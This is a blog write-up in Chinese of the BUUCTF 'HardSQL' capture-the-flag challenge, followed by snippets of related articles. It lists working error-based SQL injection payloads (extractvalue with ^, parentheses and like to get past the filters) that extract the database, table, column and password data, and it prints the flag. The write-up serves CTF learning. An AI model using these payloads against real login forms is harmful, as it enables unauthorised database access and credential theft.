BUUCTF [极客大挑战 2019]HardSQL

最新推荐文章于 2024-09-04 09:30:01 发布
最新推荐文章于 2024-09-04 09:30:01 发布
阅读量2.4k 收藏 1
点赞数 2
分类专栏: 第三周刷题记录3.21-3.27 暑假第一周作业 文章标签: 安全 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63253040/article/details/123790879
版权
本文介绍了一种通过SQL注入获取数据库信息的方法。利用特殊构造的SQL语句绕过登录验证,获取目标数据库名称、表名、列名及敏感数据。演示了如何使用extractvalue函数结合union选择来提取指定信息。
摘要由CSDN通过智能技术生成

还是这个熟悉的登录页面

尝试万能密码登录,发现有过滤,一个一个试

过滤了空格,=,substr,and等等许多,双写也无法绕过,那么换报错注入试试

这里and用^绕过  空格用括号绕过 =用like绕过

用户名:1'^extractvalue(1,concat(0x7e,(select(database()))))#
密码随便输

1'^extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like'geek')))#

1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))#

1'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))#

 只有一半,用{left(),right()}

1'^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))#
1'^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))#

 拼起来得flag:flag{a23902dd-d567-42e5-b74f-d67bda971199}

白塔河冲浪手
关注
专栏目录
BUUCTF——[极客挑战 2019]HardSQL
doraemon12345的博客
06-01 275
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
极客挑战2019Hardsql
uuzfumo的博客
11-06 414
SQL注入报错注入类型的相关题目,涉及一部分的绕过知识
[极客挑战 2019]HardSQL
weixin_42513429的博客
04-14 772
[极客挑战 2019]HardSQL报错注入updatexml()报错注入extractvalue()报错注入 报错注入 updatexml()报错注入 打一个单引号,出现报错,再打一个单引号,发现没有报错了,所以考虑是单引号闭合,然后考虑and等关键字,发现拦截,考虑报错注入,空格也过滤了,考虑括号代替,表单提交的数据使用get方法转发到check.php,所以直接通过check.php ge...
BUUCTFHardSQL
最新发布
徐徐徐的博客
09-04 575
使用以下字符替代空格,可以起到相同效果或使用和。
BUUCTF [极客挑战 2019] HardSQL 1
m0_74167420的博客
06-18 338
原因:在输入' 或者 # 号时,'会被识别出来过滤掉,#会注释掉后面的内容,因此要进行url编码。在该题目中,双写被过滤掉了,同时空格,=,union也被过滤了。或者, payload为: 用 ^ 符号代替 or。1、阅读题目,是SQL注入的题目类型。2、尝试万能密码和堆叠注入,均被过滤。
BUUCTF----[极客挑战 2019]HardSQL
woshicainiao666的博客
03-09 589
报错注入updatexml()
BUUCTF:[极客挑战 2019]HardSQL
末初的CSDN博客
11-07 620
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL 使用Burpfuzz测试过滤了哪些关键字 过滤了空格、=、substring、mid等字符 Trick 使用()代替空格 使用like代替= 使用right、left代替substring、mid 注入过程如下 1'or(1)like(2)%23 1'or(updatexml('~',concat('~',
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 790
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
[BUUCTF][极客挑战 2019]Http
朋克归零膏的博客
10-13 787
在CTF中修改http头的操作常有BUUCFT另一题,常用到的值User-AgentReferer。
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 453
反序列化漏洞。
BUUCTF---web---[极客挑战 2019]HardSQL
2201_75556700的博客
05-19 855
7、 太可恶了,只爆出了一半,问题不大,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了大概有二十来个,继续爆右边大概15个就可以凑完整,不放心的话,可以爆长点。2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试。查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换。4、用类似的方法查表名:这里注意=用like替换。
BUUCTFHardSQL[极客挑战 2019]
金 帛的博客
06-06 1463
buucft记录贴
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值